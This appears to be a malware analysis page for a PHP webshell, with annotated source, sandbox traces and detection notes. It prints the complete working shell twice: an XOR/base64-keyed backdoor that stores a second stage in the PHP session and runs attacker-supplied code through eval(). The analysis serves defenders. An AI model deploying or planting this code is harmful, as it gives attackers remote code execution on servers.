PHP Malware Analysis

Sample file names: test.php, test1.php (two copies of the same sample — the page lists one md5 and the two traces below are byte-for-byte alike apart from the path).

md5: bcc90aaf24c6432b13a33510f617807d


Deobfuscated PHP code (reformatted only: compared with the original listing at the bottom of the page it differs in whitespace and in writing `$D[$i] ^= $c` for `$D[$i] = $D[$i]^$c`; the sample carries no source-level obfuscation beyond the XOR/base64 transport it applies to its own traffic)

<?php

// Bootstrap. Every call is silenced with '@' so that a misconfigured host
// never leaks a warning into the response body.
// The PHP session is the shell's only persistent state: the executable
// second stage is kept in $_SESSION['payload'] (see the dispatch below),
// not in this file.
@session_start();
// Remove the script execution time limit so long-running commands are not
// cut off. NOTE(review): both traces on this page record this call returning
// FALSE, i.e. the sandbox refused it; the shell does not depend on it.
@set_time_limit(0);
// Suppress all PHP errors/warnings. Together with the fact that the script
// prints nothing unless the POST trigger is present, a plain GET of the file
// yields an empty document (see "Generated HTML code" below).
@error_reporting(0);
/**
 * Byte-wise XOR used for both directions of the shell's traffic.
 *
 * Every byte of $D is XORed with one byte of $K, the key byte being selected
 * by ($i + 1) & 15: only the first 16 bytes of $K are ever used and the key
 * stream starts at $K[1], wrapping to $K[0] on the 16th byte. XOR is an
 * involution, so applying the function twice with the same key yields the
 * original input; that is why one routine both decodes requests and encodes
 * responses, and why the session-stored stage can be "undone" by a second call.
 *
 * @param string $D data to transform (treated as raw bytes)
 * @param string $K key; expected to be at least 16 bytes (the sample uses 16)
 * @return string transformed data of the same length as $D
 */
function encode($D, $K)
{
    $out = '';
    $len = strlen($D);
    for ($pos = 0; $pos < $len; $pos++) {
        // '+' binds tighter than '&' in PHP, so this is ($pos + 1) & 15.
        $keyByte = $K[($pos + 1) & 15];
        $out .= chr(ord($D[$pos]) ^ ord($keyByte));
    }
    return $out;
}
// ---- Protocol constants ----------------------------------------------------
// The shell is driven entirely by one POST field. Nothing else (HTTP method
// beyond POST, User-Agent, cookie, source IP) is checked, so anyone who knows
// these three constants can operate it.
// Name of the POST parameter that carries every request.
$pass = 'pass';
// $_SESSION slot holding the XOR'd second stage.
$payloadName = 'payload';
// XOR key. encode() indexes it with "& 15", so exactly 16 bytes are used.
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
    // Request body: base64 -> XOR with $key -> plaintext stage or command.
    $data = encode(base64_decode($_POST[$pass]), $key);
    if (isset($_SESSION[$payloadName])) {
        // ---- Stage 2: a second stage is already planted in the session ----
        $payload = encode($_SESSION[$payloadName], $key);
        // encode() is XOR, so a second application is the identity. If the
        // decoded text lacks the marker, the stored copy evidently was not
        // XOR'd; re-applying the key restores the plain text.
        if (strpos($payload, "getBasicsInfo") === false) {
            $payload = encode($payload, $key);
        }
        // Arbitrary attacker-supplied PHP executes here. The second stage is
        // not on this page; judging by the call below it presumably defines
        // run() -- confirm by capturing a live session store.
        eval($payload);
        // Response framing: 16 hex chars | base64(XOR(result)) | 16 hex chars.
        // md5() yields 32 hex chars, split in half around the body. Both
        // halves are constant for a given pass/key pair, so the response
        // shape is a usable network/WAF signature even though the body
        // itself needs the key to read.
        echo substr(md5($pass . $key), 0, 16);
        // '@' hides the fatal error that would otherwise appear if run() is
        // not defined by the stage.
        echo base64_encode(encode(@run($data), $key));
        echo substr(md5($pass . $key), 16);
    } else {
        // ---- Stage 1: no second stage yet ---------------------------------
        // The first request must carry the stage itself, and "getBasicsInfo"
        // is the handshake marker the operator's client includes in it. It is
        // stored XOR'd in the session -- so the actual shell body lands only
        // in the PHP session store (typically files under session.save_path),
        // which is where to look when hunting for it on a compromised host.
        // Once stored, every later request with the 'pass' field runs stage 2;
        // the marker is never re-checked against the request.
        if (strpos($data, "getBasicsInfo") !== false) {
            $_SESSION[$payloadName] = encode($data, $key);
        }
    }
}

Execution traces (Xdebug-style function traces, one per file). Both runs show only the initialization path — session_start, set_time_limit (which returned FALSE, i.e. the sandbox refused it), error_reporting, and the three constant assignments at source lines 12–14 — and then exit. The sandbox request carried no `pass` POST parameter, so neither encode() nor eval() was reached; the traces therefore say nothing about the second stage.

data/traces/bcc90aaf24c6432b13a33510f617807d_trace-1676244854.8907.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:40.788506]
1	0	1	0.000184	393512
1	3	0	0.000288	405032	{main}	1		/var/www/html/uploads/test.php	0	0
2	4	0	0.000306	405032	session_start	0		/var/www/html/uploads/test.php	2	0
2	4	1	0.000360	405784
2	4	R			TRUE
2	5	0	0.000376	405784	set_time_limit	0		/var/www/html/uploads/test.php	3	1	0
2	5	1	0.000392	405848
2	5	R			FALSE
2	6	0	0.000405	405816	error_reporting	0		/var/www/html/uploads/test.php	4	1	0
2	6	1	0.000418	405856
2	6	R			0
1		A						/var/www/html/uploads/test.php	12	$pass = 'pass'
1		A						/var/www/html/uploads/test.php	13	$payloadName = 'payload'
1		A						/var/www/html/uploads/test.php	14	$key = '3c6e0b8a9c15224a'
1	3	1	0.000466	405816
			0.000492	316240
TRACE END   [2023-02-12 21:34:40.788851]

data/traces/bcc90aaf24c6432b13a33510f617807d_trace-1676260553.439.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:56:19.336792]
1	0	1	0.000158	393512
1	3	0	0.000258	405032	{main}	1		/var/www/html/uploads/test1.php	0	0
2	4	0	0.000275	405032	session_start	0		/var/www/html/uploads/test1.php	2	0
2	4	1	0.000331	405784
2	4	R			TRUE
2	5	0	0.000348	405784	set_time_limit	0		/var/www/html/uploads/test1.php	3	1	0
2	5	1	0.000364	405848
2	5	R			FALSE
2	6	0	0.000377	405816	error_reporting	0		/var/www/html/uploads/test1.php	4	1	0
2	6	1	0.000390	405856
2	6	R			0
1		A						/var/www/html/uploads/test1.php	12	$pass = 'pass'
1		A						/var/www/html/uploads/test1.php	13	$payloadName = 'payload'
1		A						/var/www/html/uploads/test1.php	14	$key = '3c6e0b8a9c15224a'
1	3	1	0.000438	405816
			0.000465	316240
TRACE END   [2023-02-13 01:56:19.337130]


Generated HTML code — an empty document. Without the `pass` POST parameter the script prints nothing and all errors are suppressed, so a GET probe of the file shows a blank page.

<html><head></head><body></body></html>

Original PHP code

<?php
// NOTE(review): the comments in this listing are analyst annotations; the
// sample itself contains none. The code is unchanged.
// Session is the only persistent state: the second stage lives in
// $_SESSION['payload'], not in this file.
@session_start();
// Lift the execution time limit. Both traces above show this returning FALSE
// in the sandbox; the shell does not depend on it.
@set_time_limit(0);
// Silence all errors -- a GET of the file shows nothing but an empty page.
@error_reporting(0);
// Byte-wise XOR of $D with $K, used in both directions of the traffic.
// $i+1&15 parses as ($i+1)&15, so only 16 bytes of the key are used and the
// key stream starts at $K[1]. Applying the function twice with the same key
// returns the original input.
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
// POST parameter name: the only trigger, and the only "authentication".
$pass='pass';
// Session slot that holds the XOR'd second stage.
$payloadName='payload';
// 16-byte XOR key (encode() masks the index with 15).
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    // base64 -> XOR -> plaintext stage or command.
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        // Stage 2: decode the stored stage. XOR twice is the identity, so the
        // marker check below tolerates a copy that was stored un-XOR'd.
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        // Attacker-supplied PHP runs here; presumably it defines run() --
        // the stage is not on this page, confirm from a captured session.
		eval($payload);
        // Response: 16 hex chars | base64(XOR(result)) | 16 hex chars, the
        // hex halves being md5($pass.$key) split in two -- constant for this
        // sample, hence a usable network signature.
        echo substr(md5($pass.$key),0,16);
        // '@' hides the fatal error if run() was not defined.
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        // Stage 1: the first request must carry the stage with the
        // "getBasicsInfo" marker; it is stored XOR'd in the session store
        // (typically files under session.save_path), never in this file.
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}